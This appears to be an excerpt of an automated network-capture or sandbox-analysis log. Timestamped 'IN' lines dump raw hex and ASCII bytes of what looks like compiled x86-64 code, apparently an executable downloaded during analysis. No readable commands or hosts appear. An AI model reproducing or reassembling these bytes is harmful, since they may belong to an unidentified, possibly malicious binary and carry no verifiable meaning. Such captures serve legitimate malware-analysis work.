2022-11-07 22:48:52 UTC	448	IN	Data Raw: e8 68 b8 ff ff e8 63 b8 ff ff e8 5e b8 ff ff e8 59 b8 ff ff e8 54 b8 ff ff e8 4f b8 ff ff e8 4a b8 ff ff e8 45 b8 ff ff e8 40 b8 ff ff e8 3b b8 ff ff e8 36 b8 ff ff e8 31 b8 ff ff e8 2c b8 ff ff e8 27 b8 ff ff e8 22 b8 ff ff e8 1d b8 ff ff e8 18 b8 ff ff e8 13 b8 ff ff e8 0e b8 ff ff e8 09 b8 ff ff e8 04 b8 ff ff e8 ff b7 ff ff e8 fa b7 ff ff e8 f5 b7 ff ff e8 f0 b7 ff ff e8 eb b7 ff ff e8 e6 b7 ff ff e8 e1 b7 ff ff e8 dc b7 ff ff e8 d7 b7 ff ff e8 d2 b7 ff ff e8 cd b7 ff ff e8 c8 b7 ff ff e8 c3 b7 ff ff e8 be b7 ff ff e8 b9 b7 ff ff e8 b4 b7 ff ff e8 af b7 ff ff e8 aa b7 ff ff e8 a5 b7 ff ff e8 a0 b7 ff ff e8 9b b7 ff ff e8 96 b7 ff ff e8 91 b7 ff ff e8 8c b7 ff ff e8 87 b7 ff ff e8 82 b7 ff ff e8 7d b7 ff ff e8 78 b7 ff ff e8 73 b7 ff ff e8 6e b7 ff ff Data Ascii: hc^YTOJE@;61,'"}xsn
2022-11-07 22:48:52 UTC	464	IN	Data Raw: f0 0f c1 13 ff ca 0f 1f 80 00 00 00 00 85 d2 0f 84 bc fe ff ff 48 89 4c 24 30 88 44 24 2f 48 89 1c 24 89 54 24 08 e8 62 17 00 00 0f b6 44 24 2f 48 8b 4c 24 30 e9 97 fe ff ff 0f b6 54 24 2d 84 d2 74 af 48 8b 84 24 88 00 00 00 48 89 44 24 60 48 8b 84 24 90 00 00 00 48 89 44 24 68 48 8b 84 24 80 00 00 00 48 8b 48 18 48 8d 15 fd 3f 22 00 48 89 14 24 48 89 4c 24 08 48 8d 4c 24 60 48 89 4c 24 10 e8 a5 b1 f9 ff 48 8b 44 24 18 48 8b 00 48 89 44 24 38 0f b6 4c 24 20 88 4c 24 2e 48 8b 94 24 80 00 00 00 48 89 14 24 0f 1f 00 e8 3b 0f 00 00 0f b6 44 24 2e 48 8b 4c 24 38 e9 31 ff ff ff 31 c0 31 d2 e9 da fe ff ff 48 8b 41 10 48 89 54 24 40 48 89 44 24 48 e9 a9 fe ff ff 48 89 0c 24 e8 67 13 00 00 48 8b 8c 24 80 00 00 00 e9 70 fe ff ff 31 c9 31 db e9 86 fd ff ff 48 8b 48 Data Ascii: HL$0D$/H$T$bD$/HL$0T$-tH$HD$`H$HD$hH$HHH?"H$HL$HL$`HL$HD$HHD$8L$ L$.H$H$;D$.HL$8111HAHT$@HD$HH$gH$p11HH
2022-11-07 22:48:52 UTC	480	IN	Data Raw: 59 ca 43 00 83 3d 32 0a 47 00 00 66 90 0f 85 a6 00 00 00 48 89 05 4b ca 43 00 48 8d 05 0e d2 26 00 48 89 04 24 48 c7 44 24 08 14 00 00 00 e8 fa b9 ff ff 48 8b 44 24 18 48 8b 4c 24 10 48 89 0d 09 ca 43 00 83 3d f2 09 47 00 00 66 90 75 5c 48 89 05 ff c9 43 00 48 8d 05 cd 0d 27 00 48 89 04 24 48 c7 44 24 08 1d 00 00 00 0f 1f 00 e8 bb b9 ff ff 48 8b 44 24 18 48 8b 4c 24 10 48 89 0d 7a c9 43 00 83 3d b3 09 47 00 00 75 11 48 89 05 72 c9 43 00 48 8b 6c 24 20 48 83 c4 28 c3 48 8d 3d 61 c9 43 00 e8 24 1e ff ff eb e8 48 8d 3d a3 c9 43 00 e8 16 1e ff ff eb 9d 48 8d 3d a5 c9 43 00 e8 08 1e ff ff e9 50 ff ff ff 48 8d 3d 44 c9 43 00 e8 f7 1d ff ff e9 ff fe ff ff 48 8d 3d 63 c9 43 00 e8 e6 1d ff ff e9 ae fe ff ff 48 8d 3d 02 c9 43 00 e8 d5 1d ff ff e9 5d fe ff ff 48 8d Data Ascii: YC=2GfHKCH&H$HD$HD$HL$HC=Gfu\HCH'H$HD$HD$HL$HzC=GuHrCHl$ H(H=aC$H=CH=CPH=DCH=cCH=C]H
2022-11-07 22:48:52 UTC	496	IN	Data Raw: e8 48 7f f9 ff 48 8b 7c 24 20 84 07 48 8b 05 aa e0 42 00 83 3d 23 ca 46 00 00 0f 85 41 29 00 00 48 89 07 48 8d 05 63 c7 21 00 48 89 04 24 48 8b 4c 24 40 48 89 4c 24 08 48 8d 15 2e 64 26 00 48 89 54 24 10 48 c7 44 24 18 0c 00 00 00 e8 fb 7e f9 ff 48 8b 7c 24 20 84 07 48 8b 05 65 e0 42 00 83 3d d6 c9 46 00 00 66 0f 1f 44 00 00 0f 85 e4 28 00 00 48 89 07 48 8d 05 10 c7 21 00 48 89 04 24 48 8b 4c 24 40 48 89 4c 24 08 48 8d 15 ad 69 26 00 48 89 54 24 10 48 c7 44 24 18 0d 00 00 00 e8 a8 7e f9 ff 48 8b 7c 24 20 84 07 48 8b 05 1a e0 42 00 83 3d 83 c9 46 00 00 0f 85 8d 28 00 00 48 89 07 48 8d 05 c3 c6 21 00 48 89 04 24 48 8b 4c 24 40 48 89 4c 24 08 48 8d 15 bf 77 26 00 48 89 54 24 10 48 c7 44 24 18 10 00 00 00 e8 5b 7e f9 ff 48 8b 7c 24 20 84 07 48 8b 05 d5 df 42 Data Ascii: HH\|$ HB=#FA)HHc!H$HL$@HL$H.d&HT$HD$~H\|$ HeB=FfD(HH!H$HL$@HL$Hi&HT$HD$~H\|$ HB=F(HH!H$HL$@HL$Hw&HT$HD$[~H\|$ HB
2022-11-07 22:48:52 UTC	512	IN	Data Raw: 24 4c 29 e1 48 89 4c 24 08 48 89 54 24 10 40 88 7c 24 18 e8 d5 27 f8 ff 48 8b 44 24 20 48 85 c0 7c 47 4c 8b 5c 24 70 4a 8d 04 18 48 8d 40 01 48 8b 4c 24 40 48 8b 54 24 68 48 8b 9c 24 b0 00 00 00 48 8b b4 24 a8 00 00 00 0f b6 7c 24 3e 44 0f b6 44 24 3d 4c 8b 8c 24 98 00 00 00 4c 8b 94 24 90 00 00 00 e9 d1 fd ff ff 48 c7 84 24 c0 00 00 00 ff ff ff ff 48 8b ac 24 80 00 00 00 48 81 c4 88 00 00 00 c3 48 c7 84 24 c0 00 00 00 ff ff ff ff 48 8b ac 24 80 00 00 00 48 81 c4 88 00 00 00 c3 48 8b 84 24 90 00 00 00 48 89 04 24 48 89 4c 24 08 48 8b 84 24 a0 00 00 00 48 89 44 24 10 48 8b 84 24 a8 00 00 00 48 89 44 24 18 48 89 5c 24 20 48 8b 84 24 b8 00 00 00 48 89 44 24 28 e8 6a 25 f8 ff 48 8b 44 24 30 48 89 84 24 c0 00 00 00 48 8b ac 24 80 00 00 00 48 81 c4 88 00 00 00 Data Ascii: $L)HL$HT$@\|$'HD$ H\|GL\$pJH@HL$@HT$hH$H$\|$>DD$=L$L$H$H$HH$H$HH$H$HL$H$HD$H$HD$H\$ H$HD$(j%HD$0H$H$H
2022-11-07 22:48:52 UTC	528	IN	Data Raw: 08 48 85 db 0f 85 8a 00 00 00 48 89 74 24 58 48 89 5c 24 40 48 89 3c 24 4c 89 44 24 08 e8 cb fc ff ff 48 8b 44 24 10 48 8b 4c 24 18 48 c7 04 24 00 00 00 00 48 8b 54 24 58 48 89 54 24 08 48 8b 54 24 40 48 89 54 24 10 48 89 44 24 18 48 89 4c 24 20 e8 16 bb fc ff 48 8b 44 24 48 48 ff c0 48 8b 4c 24 28 48 8b 54 24 30 48 8b 9c 24 80 00 00 00 48 39 c3 0f 8f 59 ff ff ff 48 89 8c 24 90 00 00 00 48 89 94 24 98 00 00 00 48 8b 6c 24 68 48 83 c4 70 c3 48 89 7c 24 50 4c 89 44 24 38 48 c7 04 24 00 00 00 00 48 89 74 24 08 48 89 5c 24 10 48 8d 05 c6 c0 25 00 48 89 44 24 18 48 c7 44 24 20 01 00 00 00 e8 a3 ba fc ff 48 8b 74 24 28 48 8b 5c 24 30 48 8b 7c 24 50 4c 8b 44 24 38 e9 27 ff ff ff 31 d2 31 c9 eb 91 0f 1f 40 00 e8 7b 41 fe ff e9 96 fe ff ff cc cc cc cc cc cc cc cc Data Ascii: HHt$XH\$@H<$LD$HD$HL$H$HT$XHT$HT$@HT$HD$HL$ HD$HHHL$(HT$0H$H9YH$H$Hl$hHpH\|$PLD$8H$Ht$H\$H%HD$HD$ Ht$(H\$0H\|$PLD$8'11@{A
2022-11-07 22:48:52 UTC	544	IN	Data Raw: 48 8d 15 06 ad 21 00 48 89 14 24 66 90 e8 1b 5e f8 ff 48 8b 7c 24 08 48 8b 44 24 48 48 89 47 08 83 3d 16 0a 46 00 00 75 29 48 8b 44 24 50 48 89 07 48 8d 05 15 10 2b 00 48 89 84 24 a0 00 00 00 48 89 bc 24 a8 00 00 00 48 8b 6c 24 58 48 83 c4 60 c3 48 8b 44 24 50 e8 71 1e fe ff eb d3 48 8b 44 24 70 48 8b 40 18 48 8b 4c 24 78 48 89 0c 24 ff d0 48 8b 44 24 18 48 8b 4c 24 20 48 85 c0 74 1a 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 8b 6c 24 58 48 83 c4 60 c3 48 8b 44 24 68 48 89 04 24 48 8b 84 24 80 00 00 00 48 89 44 24 18 8b 84 24 88 00 00 00 89 44 24 20 48 8b 84 24 90 00 00 00 48 89 44 24 28 48 8b 84 24 98 00 00 00 48 89 44 24 30 e8 32 fd ff ff 48 8b 44 24 38 48 8b 4c 24 40 48 89 84 24 a0 00 00 00 48 89 8c 24 a8 00 00 00 48 8b 6c 24 58 48 83 c4 60 c3 Data Ascii: H!H$f^H\|$HD$HHG=Fu)HD$PHH+H$H$Hl$XH`HD$PqHD$pH@HL$xH$HD$HL$ HtH$H$Hl$XH`HD$hH$H$HD$$D$ H$HD$(H$HD$02HD$8HL$@H$H$Hl$XH`
2022-11-07 22:48:53 UTC	560	IN	Data Raw: 00 48 89 8c 24 90 00 00 00 48 8b 8c 24 e0 00 00 00 48 89 8c 24 88 00 00 00 48 8b 8c 24 e8 00 00 00 48 89 8c 24 80 00 00 00 48 8b 8c 24 f0 00 00 00 48 89 4c 24 78 48 89 04 24 48 c7 44 24 08 08 00 00 00 48 8b 84 24 b8 00 00 00 48 89 44 24 10 8b 84 24 c0 00 00 00 48 89 44 24 18 48 8b 84 24 a0 00 00 00 48 89 44 24 20 48 8b 84 24 98 00 00 00 48 89 44 24 28 48 8b 84 24 90 00 00 00 48 89 44 24 30 48 8b 84 24 88 00 00 00 48 89 44 24 38 48 8b 84 24 80 00 00 00 48 89 44 24 40 48 8b 44 24 78 48 89 44 24 48 48 c7 44 24 50 00 00 00 00 e8 f8 a7 fd ff 48 8b 44 24 58 48 85 c0 75 24 31 c0 31 c9 48 89 84 24 f8 00 00 00 48 89 8c 24 00 01 00 00 48 8b ac 24 a8 00 00 00 48 81 c4 b0 00 00 00 c3 48 89 04 24 e8 e1 ea f7 ff 48 8b 4c 24 08 48 8d 05 55 db 2a 00 eb c9 74 04 48 8b 40 Data Ascii: H$H$H$H$H$H$HL$xH$HD$H$HD$$HD$H$HD$ H$HD$(H$HD$0H$HD$8H$HD$@HD$xHD$HHD$PHD$XHu$11H$H$H$HH$HL$HU*tH@
2022-11-07 22:48:53 UTC	576	IN	Data Raw: 8b 44 24 18 83 3d 32 8a 45 00 00 66 90 0f 85 08 1c 00 00 48 89 05 43 42 42 00 48 8b 05 94 40 42 00 48 89 04 24 48 8d 05 59 43 25 00 48 89 44 24 08 48 c7 44 24 10 12 00 00 00 e8 ce 33 ff ff 48 8b 44 24 18 83 3d f2 89 45 00 00 66 90 0f 85 b7 1b 00 00 48 89 05 e3 40 42 00 48 8b 05 34 40 42 00 48 89 04 24 48 8d 05 df 14 25 00 48 89 44 24 08 48 c7 44 24 10 09 00 00 00 e8 8e 33 ff ff 48 8b 44 24 18 83 3d b2 89 45 00 00 66 90 0f 85 66 1b 00 00 48 89 05 cb 42 42 00 48 8b 05 f4 3f 42 00 48 89 04 24 48 8d 05 bf 51 25 00 48 89 44 24 08 48 c7 44 24 10 14 00 00 00 e8 4e 33 ff ff 48 8b 44 24 18 83 3d 72 89 45 00 00 66 90 0f 85 15 1b 00 00 48 89 05 7b 43 42 00 48 c7 04 24 f6 ff ff ff e8 46 72 ff ff 48 8b 44 24 08 48 89 05 f2 87 45 00 48 c7 04 24 f5 ff ff ff e8 2d 72 ff Data Ascii: D$=2EfHCBBH@BH$HYC%HD$HD$3HD$=EfH@BH4@BH$H%HD$HD$3HD$=EffHBBH?BH$HQ%HD$HD$N3HD$=rEfH{CBH$FrHD$HEH$-r
2022-11-07 22:48:53 UTC	592	IN	Data Raw: 48 85 c9 0f 86 90 00 00 00 31 c0 48 89 d1 31 db e9 4e ff ff ff 0f 57 c0 0f 11 84 24 98 08 00 00 48 89 84 24 a8 08 00 00 48 89 9c 24 b0 08 00 00 48 8b ac 24 70 08 00 00 48 81 c4 78 08 00 00 c3 31 c9 e9 2e fd ff ff 48 8d 05 3f 31 21 00 31 c9 e9 20 fd ff ff 0f 57 c0 0f 11 84 24 98 08 00 00 48 89 84 24 a8 08 00 00 48 89 9c 24 b0 08 00 00 48 8b ac 24 70 08 00 00 48 81 c4 78 08 00 00 c3 48 85 c9 76 1b 31 c0 48 89 d1 31 db 90 e9 3b fc ff ff 31 c0 e8 d4 62 fd ff 31 c0 e8 cd 62 fd ff 31 c0 e8 c6 62 fd ff 90 0f 1f 44 00 00 e8 bb 41 fd ff e9 96 fb ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 8d 84 24 58 ff ff ff 0f 1f 84 00 00 00 00 00 48 3b 41 10 0f 86 25 02 00 00 48 81 ec 28 01 00 00 48 Data Ascii: H1H1NW$H$H$H$pHx1.H?1!1 W$H$H$H$pHxHv1H1;1b1b1bDAeH%(HH$XH;A%H(H
2022-11-07 22:48:53 UTC	608	IN	Data Raw: 24 50 01 00 00 48 8b 94 24 a8 00 00 00 48 8b 9c 24 60 01 00 00 48 8b 74 24 70 4c 8b 44 24 68 4c 8b 8c 24 a0 00 00 00 4c 8b 94 24 c8 00 00 00 4c 8b 5c 24 60 4c 8b ac 24 c0 00 00 00 e9 58 fe ff ff 66 0f 1f 84 00 00 00 00 00 0f 1f 00 49 81 ff 14 01 00 00 0f 84 3f 01 00 00 49 81 ff 0c 02 00 00 0f 84 be 00 00 00 66 0f 1f 44 00 00 49 81 ff 0d 02 00 00 0f 85 4e f0 ff ff 48 89 3c 24 48 89 4c 24 08 4c 89 74 24 10 48 b8 ab aa aa aa aa aa aa aa 49 f7 ed 49 8d 4c 15 00 48 c1 f9 03 4c 89 ea 49 c1 fd 3f 4c 29 e9 48 8d 0c 49 48 c1 e1 02 48 29 ca 48 85 d2 b9 0c 00 00 00 48 0f 44 d1 48 89 54 24 18 48 c7 44 24 20 00 00 00 00 e8 1b dc ff ff 48 8b 7c 24 28 4c 8b 64 24 30 4c 8b 74 24 38 48 8b 84 24 80 00 00 00 48 8b 94 24 d0 00 00 00 48 8b 9c 24 60 01 00 00 48 8b 74 24 70 4c Data Ascii: $PH$H$`Ht$pLD$hL$L$L\$`L$XfI?IfDINH<$HL$Lt$HIILHLI?L)HIHH)HHDHT$HD$ H\|$(Ld$0Lt$8H$H$H$`Ht$pL
2022-11-07 22:48:53 UTC	624	IN	Data Raw: 8b 84 24 d0 00 00 00 48 89 44 24 30 48 8b 84 24 50 02 00 00 48 89 44 24 38 e8 cf 3a 00 00 48 8b 44 24 40 48 8b 4c 24 48 48 8b 54 24 50 48 89 84 24 60 02 00 00 48 89 8c 24 68 02 00 00 48 89 94 24 70 02 00 00 0f 57 c0 0f 11 84 24 78 02 00 00 48 8b ac 24 20 02 00 00 48 81 c4 28 02 00 00 c3 4c 89 1c 24 4c 89 54 24 08 48 89 7c 24 10 48 89 4c 24 18 48 8b 84 24 f8 00 00 00 48 89 44 24 20 48 8b 84 24 98 00 00 00 48 89 44 24 28 48 8b 84 24 d0 00 00 00 48 89 44 24 30 48 8b 05 bc dc 40 00 48 89 44 24 38 e8 42 3a 00 00 48 8b 44 24 40 48 8b 4c 24 48 48 8b 54 24 50 48 89 84 24 08 02 00 00 48 89 8c 24 10 02 00 00 48 89 94 24 18 02 00 00 48 8d 84 24 08 02 00 00 48 89 04 24 48 8b 84 24 c0 00 00 00 48 f7 d8 48 89 44 24 08 e8 ba 18 00 00 48 8b 84 24 08 02 00 00 48 0f ba e0 Data Ascii: $HD$0H$PHD$8:HD$@HL$HHT$PH$`H$hH$pW$xH$ H(L$LT$H\|$HL$H$HD$ H$HD$(H$HD$0H@HD$8B:HD$@HL$HHT$PH$H$H$H$H$H$HHD$H$H
2022-11-07 22:48:53 UTC	640	IN	Data Raw: 48 8b 44 24 20 48 8b 74 24 38 0f 1f 00 e9 2d ff ff ff 48 8b 84 24 a8 00 00 00 48 89 04 24 48 ff c9 48 89 4c 24 08 e8 22 06 00 00 48 8b 44 24 20 48 8b 74 24 38 e9 05 ff ff ff 48 8b 74 24 38 e9 fe fe ff ff 4c 89 e8 e9 74 fe ff ff 48 b8 29 5c 8f c2 f5 28 5c 8f 49 0f af c7 48 ba b0 1e 85 eb 51 b8 1e 05 48 01 d0 48 c1 c0 3c 48 ba d6 a3 70 3d 0a d7 a3 00 48 39 c2 0f 83 2c fe ff ff eb c4 4d 89 e3 49 89 d2 e9 32 fd ff ff 4c 89 d2 4c 8b a4 24 80 00 00 00 e9 f2 fc ff ff 4d 89 da 49 89 d1 e9 93 fc ff ff 4c 89 ca 4c 8b 9c 24 88 00 00 00 e9 57 fc ff ff 4d 89 d1 49 89 d0 e9 f8 fb ff ff 4c 89 c2 4c 8b 94 24 90 00 00 00 90 e9 bb fb ff ff 4d 89 c8 48 89 d7 e9 5f fb ff ff 4c 8b 8c 24 98 00 00 00 e9 23 fb ff ff 48 89 fe 48 89 d3 e9 b5 fa ff ff 48 89 d1 48 89 f2 48 8b 7c 24 Data Ascii: HD$ Ht$8-H$H$HHL$"HD$ Ht$8Ht$8LtH)\(\IHQHH<Hp=H9,MI2LL$MILL$WMILL$MH_L$#HHHHH\|$
2022-11-07 22:48:53 UTC	656	IN	Data Raw: c1 e1 04 48 8d 1d a3 db 29 00 48 8b 34 19 48 8b 4c 19 08 48 8d 3d 13 4d 1f 00 48 89 3c 24 48 89 44 24 08 48 89 74 24 10 48 89 4c 24 18 e8 1b ff f6 ff 48 8b 7c 24 20 48 8b 44 24 38 48 89 c1 48 c1 e0 05 48 8d 15 03 e4 29 00 48 8b 1c 10 48 8b 74 02 10 4c 8b 44 10 08 48 8b 44 02 18 4c 89 47 08 48 89 47 18 83 3d d1 49 44 00 00 90 75 0c 48 89 1f 48 89 77 10 e9 65 ff ff ff e8 8d 5f fc ff 48 83 c7 10 e8 a4 5f fc ff 0f 1f 40 00 e9 4e ff ff ff 83 3d a4 49 44 00 00 0f 85 c6 00 00 00 48 89 05 af 04 41 00 48 8d 05 23 5b 24 00 48 89 04 24 48 c7 44 24 08 1f 00 00 00 e8 6e f9 fc ff 48 8b 44 24 18 48 8b 4c 24 10 48 89 0d 6d 10 41 00 83 3d 66 49 44 00 00 75 7b 48 89 05 65 10 41 00 e8 88 57 f6 ff 48 8b 04 24 48 8b 4c 24 08 48 c7 04 24 00 00 00 00 48 89 44 24 08 48 89 4c 24 Data Ascii: H)H4HLH=MH<$HD$Ht$HL$H\|$ HD$8HHH)HHtLDHDLGHG=IDuHHwe_H_@N=IDHAH#[$H$HD$nHD$HL$HmA=fIDu{HeAWH$HL$H$HD$HL$
2022-11-07 22:48:53 UTC	672	IN	Data Raw: 10 0f 86 1a 01 00 00 48 83 ec 30 48 89 6c 24 28 48 8d 6c 24 28 48 8b 44 24 38 48 83 78 10 ff 0f 84 da 00 00 00 48 8b 88 b8 01 00 00 90 48 85 c9 0f 85 ab 00 00 00 0f b6 88 20 02 00 00 84 c9 74 7d 80 f9 03 75 5c 48 8b 48 10 48 89 0c 24 e8 3a 0e fe ff 48 8b 44 24 08 48 8b 4c 24 10 48 89 4c 24 20 48 89 44 24 18 48 8b 54 24 38 48 c7 42 10 ff ff ff ff 48 81 c2 18 02 00 00 48 89 14 24 e8 29 d6 fb ff 48 8b 44 24 18 48 89 44 24 40 48 8b 44 24 20 48 89 44 24 48 48 8b 6c 24 28 48 83 c4 30 c3 48 8b 48 10 48 89 0c 24 0f 1f 00 e8 1b 0a fe ff 48 8b 44 24 08 48 8b 4c 24 10 eb 9f 48 8b 15 d0 1b 40 00 48 8b 48 10 48 89 0c 24 48 8b 0a ff d1 48 8b 44 24 08 48 8b 4c 24 10 e9 7c ff ff ff 48 89 0c 24 e8 c3 ba fb ff 48 8b 44 24 38 48 c7 80 b8 01 00 00 00 00 00 00 e9 37 ff ff ff Data Ascii: H0Hl$(Hl$(HD$8HxHH t}u\HHH$:HD$HL$HL$ HD$HT$8HBHH$)HD$HD$@HD$ HD$HHl$(H0HHH$HD$HL$H@HHH$HHD$HL$\|H$HD$8H7
2022-11-07 22:48:53 UTC	688	IN	Data Raw: c4 28 c3 48 8d 05 03 6d 1f 00 48 89 04 24 e8 1a 1e f6 ff 48 8b 44 24 08 48 c7 40 08 1c 00 00 00 48 8d 0d f8 c8 23 00 48 89 08 48 8d 0d 1c d0 28 00 48 89 4c 24 48 48 89 44 24 50 48 8b 6c 24 20 48 83 c4 28 c3 48 8d 05 01 dc 28 00 48 89 44 24 48 48 8d 05 1d 64 28 00 48 89 44 24 50 48 8b 6c 24 20 48 83 c4 28 c3 e8 01 c2 fb ff 90 e9 bb fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 12 01 00 00 48 83 ec 38 48 89 6c 24 30 48 8d 6c 24 30 48 8b 44 24 40 48 8b 48 08 48 83 f9 ff 0f 84 cf 00 00 00 48 89 0c 24 90 e8 fb c9 fd ff 48 8b 44 24 08 48 8b 4c 24 10 48 85 c0 74 77 48 89 44 24 20 48 89 4c 24 28 48 8d 05 fb fd 1f 00 48 89 04 24 e8 32 1d f6 ff 48 8b 44 24 Data Ascii: (HmH$HD$H@H#HH(HL$HHD$PHl$ H(H(HD$HHd(HD$PHl$ H(eH%(HH;aH8Hl$0Hl$0HD$@HHHH$HD$HL$HtwHD$ HL$(HH$2HD$
2022-11-07 22:48:53 UTC	704	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 06 01 00 00 48 83 ec 48 48 89 6c 24 40 48 8d 6c 24 40 48 8b 54 24 50 48 85 d2 0f 84 af 00 00 00 48 c7 44 24 2c 00 00 00 00 0f 57 c0 0f 11 44 24 30 b8 13 00 00 00 eb 08 88 5c 0c 2c 48 8d 41 ff 48 83 fa 0a 72 30 48 89 c1 48 b8 cd cc cc cc cc cc cc cc 48 89 d3 48 f7 e2 48 c1 ea 03 48 83 c3 30 48 8d 34 92 48 d1 e6 48 29 f3 48 83 f9 14 72 c7 e9 82 00 00 00 48 83 f8 14 73 72 48 8d 4a 30 88 4c 04 2c 48 c7 04 24 00 00 00 00 48 8d 48 ec 48 89 ca 48 c1 f9 3f 48 21 c8 48 8d 44 04 2c 48 89 44 24 08 48 f7 da 48 89 54 24 10 e8 99 fc f9 ff 48 8b 44 24 20 48 8b 4c 24 18 48 89 4c 24 58 48 89 44 24 60 48 8b 6c 24 40 48 83 c4 48 c3 48 8d 05 90 00 23 00 48 89 44 24 58 48 Data Ascii: eH%(HH;aHHHl$@Hl$@HT$PHHD$,WD$0\,HAHr0HHHHHH0H4HH)HrHsrHJ0L,H$HHHH?H!HD,HD$HHT$HD$ HL$HL$XHD$`Hl$@HHH#HD$XH
2022-11-07 22:48:53 UTC	720	IN	Data Raw: 42 fb ff e9 45 ff ff ff 48 8d 7c 24 38 48 39 3b 0f 85 6c ff ff ff 48 89 23 e9 64 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 65 48 8b 0c 25 28 00 00 00 48 8b 89 00 00 00 00 48 3b 61 10 0f 86 c0 00 00 00 48 83 ec 18 48 89 6c 24 10 48 8d 6c 24 10 48 8b 59 20 48 85 db 0f 85 b0 00 00 00 48 8b 54 24 20 66 0f 1f 44 00 00 48 85 d2 0f 84 8b 00 00 00 48 8b 1a 48 8b 4a 08 48 8b 44 24 28 48 39 c8 73 75 48 c1 e0 04 48 8b 14 03 48 8b 74 03 08 48 8d 3c 03 4c 8b 44 24 30 49 39 c8 73 52 49 c1 e0 04 49 8b 0c 18 4d 8b 4c 18 08 4c 89 4c 03 08 4d 8d 0c 18 83 3d 7e 49 43 00 00 75 2c 48 89 0c 03 4a 89 74 03 08 83 3d 6c 49 43 00 00 75 0e 4a 89 14 03 48 8b 6c 24 10 48 83 c4 18 c3 4c 89 cf e8 04 5f fb ff eb ec 66 90 e8 db 5e fb ff eb d1 4c 89 c0 e8 71 62 fb ff e8 6c 62 Data Ascii: BEH\|$8H9;lH#deH%(HH;aHHl$Hl$HY HHT$ fDHHHJHD$(H9suHHHtH<LD$0I9sRIIMLLLM=~ICu,HJt=lICuJHl$HL_f^Lqblb
2022-11-07 22:48:53 UTC	736	IN	Data Raw: 4c 8d 42 ff 49 29 c0 49 39 d0 73 35 46 0f b6 04 07 4c 8d 4b ff 49 29 c1 4c 39 cb 76 19 46 0f b6 0c 0e 45 38 c1 74 cc 48 89 44 24 40 48 8b 6c 24 10 48 83 c4 18 c3 4c 89 c8 48 89 d9 e8 2c 23 fb ff 4c 89 c0 48 89 d1 e8 21 23 fb ff 90 48 83 ec 18 48 89 6c 24 10 48 8d 6c 24 10 48 8b 54 24 20 48 8b 1a 48 8b 72 08 48 ff ce 48 8b 7c 24 28 4c 8b 44 24 30 48 89 f0 eb 62 48 ff ce 48 ff c8 48 85 c0 7c 24 66 0f 1f 84 00 00 00 00 00 4c 39 c6 0f 83 8d 00 00 00 44 0f b6 0c 37 44 0f b6 14 03 45 38 d1 74 d4 48 85 c0 7c 40 4c 8b 8a 18 08 00 00 4c 8b 92 10 08 00 00 4c 39 c8 73 5e 4d 8b 0c c2 4c 39 c6 73 4a 44 0f b6 14 37 4e 8b 54 d2 10 4d 39 d1 7d 10 4c 01 d6 48 89 c8 4c 39 c6 7d 1d 48 89 c1 eb 9a 4d 89 ca eb eb 48 8d 46 01 48 89 44 24 38 48 8b 6c 24 10 48 83 c4 18 c3 48 c7 Data Ascii: LBI)I9s5FLKI)L9vFE8tHD$@Hl$HLH,#LH!#HHl$Hl$HT$ HHrHH\|$(LD$0HbHHH\|$fL9D7DE8tH\|@LLL9s^ML9sJD7NTM9}LHL9}HMHFHD$8Hl$HH
2022-11-07 22:48:53 UTC	752	IN	Data Raw: e0 00 00 00 48 89 84 24 e8 00 00 00 90 84 c9 0f 84 ce 0a 00 00 4d 85 c9 0f 84 06 0a 00 00 48 8b 9c 24 c0 00 00 00 48 8b bc 24 b8 00 00 00 48 8b 84 24 d0 00 00 00 48 39 d8 0f 83 86 0c 00 00 c6 04 07 5c 48 ff 84 24 d0 00 00 00 b8 01 00 00 00 48 89 c2 eb 03 48 89 d8 48 39 c6 0f 8e 85 07 00 00 0f 86 56 0c 00 00 41 0f b6 1c 00 90 80 fb 5c 75 06 48 8d 58 01 eb dd 80 fb 2f 74 f5 80 fb 2e 75 2e 48 8d 78 01 48 39 fe 75 05 48 89 fb eb c5 0f 86 1c 0c 00 00 46 0f b6 4c 00 01 41 80 f9 5c 74 e9 41 80 f9 2f 74 e3 0f 1f 44 00 00 80 fb 2e 0f 85 29 07 00 00 48 8d 58 01 48 39 de 0f 86 e2 0b 00 00 42 0f b6 5c 00 01 0f 1f 40 00 80 fb 2e 0f 85 02 07 00 00 48 8d 58 02 48 39 de 0f 85 04 04 00 00 48 8b bc 24 d0 00 00 00 66 90 48 39 d7 0f 8e 87 00 00 00 48 ff cf 48 89 bc 24 d0 00 Data Ascii: H$MH$H$H$H9\H$HHH9VA\uHX/t.u.HxH9uHFLA\tA/tD.)HXH9B\@.HXH9H$fH9HH$
2022-11-07 22:48:53 UTC	768	IN	Data Raw: 4c 29 e0 66 0f 1f 84 00 00 00 00 00 90 49 83 fd 20 0f 83 e4 01 00 00 4c 8b 72 08 4c 8b 3a 46 0f b6 5c 2c 38 4c 39 f0 72 c1 0f 1f 40 00 e9 c1 01 00 00 4d 8d 6c 24 e0 49 f7 dd 4c 89 6a 18 4c 01 cb 48 89 5a 20 4b 8d 1c 04 48 8d 5b e0 48 85 db 0f 8e 22 01 00 00 45 85 d2 0f 85 78 01 00 00 48 83 ff 01 0f 85 6e 01 00 00 b8 01 00 00 00 eb 1d 4c 8d 66 30 47 88 24 2e 48 d3 e6 4c 21 de 49 29 f0 49 ff c5 48 ff cb 4c 89 c6 4c 89 c8 48 85 db 7e 52 48 8d 34 b6 4c 8d 04 80 49 d1 e0 4d 89 c1 49 d1 e0 41 bc 01 00 00 00 49 d3 e4 4d 21 dc 4d 39 e0 77 1e 48 d1 e6 49 89 f0 48 d3 ee 4c 21 de 4c 8b 62 08 4c 8b 32 4d 39 ec 77 a4 90 e9 fa 00 00 00 c6 84 24 80 00 00 00 00 48 8b 6c 24 58 48 83 c4 60 c3 4c 89 6a 18 48 89 14 24 49 d3 e2 4d 21 da 49 09 f2 4c 89 54 24 08 48 89 7c 24 10 Data Ascii: L)fI LrL:F\,8L9r@Ml$ILjLHZ 